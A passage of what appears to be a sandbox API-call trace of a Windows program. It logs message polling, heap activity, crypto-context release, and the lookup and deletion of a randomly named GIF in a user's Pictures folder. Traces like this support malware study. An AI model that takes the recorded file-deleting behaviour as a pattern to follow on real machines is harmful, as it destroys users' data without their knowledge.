PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.147] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.148] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.148] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.148] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.148] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.148] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.148] CryptReleaseContext (hProv=0xa7bef0, dwFlags=0x0) returned 1 [0212.148] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.149] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.149] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.149] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.149] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.149] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.149] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.149] CloseHandle (hObject=0x504) returned 1 [0212.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.151] CloseHandle (hObject=0x4f4) returned 1 [0212.153] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.154] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.154] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.154] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eabe0 [0212.155] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yyplXweR.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif", lpFilePart=0x8cedf4*="yyplXweR.gif") returned 0x25 [0212.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0212.156] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yyplxwer.gif")) returned 0x20 [0212.156] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d89dd0, ftCreationTime.dwHighDateTime=0x1d5ca9c, ftLastAccessTime.dwLowDateTime=0xd6529ab0, ftLastAccessTime.dwHighDateTime=0x1d5d7c3, ftLastWriteTime.dwLowDateTime=0xd6529ab0, ftLastWriteTime.dwHighDateTime=0x1d5d7c3, nFileSizeHigh=0x0, nFileSizeLow=0xe4ac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="yyplXweR.gif", cAlternateFileName="")) returned 0x9e1bf8 [0212.156] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yyplxwer.gif")) returned 1 [0212.159] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d89dd0, ftCreationTime.dwHighDateTime=0x1d5ca9c, ftLastAccessTime.dwLowDateTime=0xd6529ab0, ftLastAccessTime.dwHighDateTime=0x1d5d7c3, ftLastWriteTime.dwLowDateTime=0xd6529ab0, ftLastWriteTime.dwHighDateTime=0x1d5d7c3, nFileSizeHigh=0x0, nFileSizeLow=0xe4ac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="yyplXweR.gif", cAlternateFileName="")) returned 0 [0212.159] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0212.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0212.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0212.160] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.160] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eabe0 [0212.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yyplXweR.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif", lpFilePart=0x8cf650*="yyplXweR.gif") returned 0x25 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0212.162] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yyplXweR.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yyplxwer.gif")) returned 0xffffffff [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0212.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0212.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.162] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0212.163] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0212.163] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0212.164] 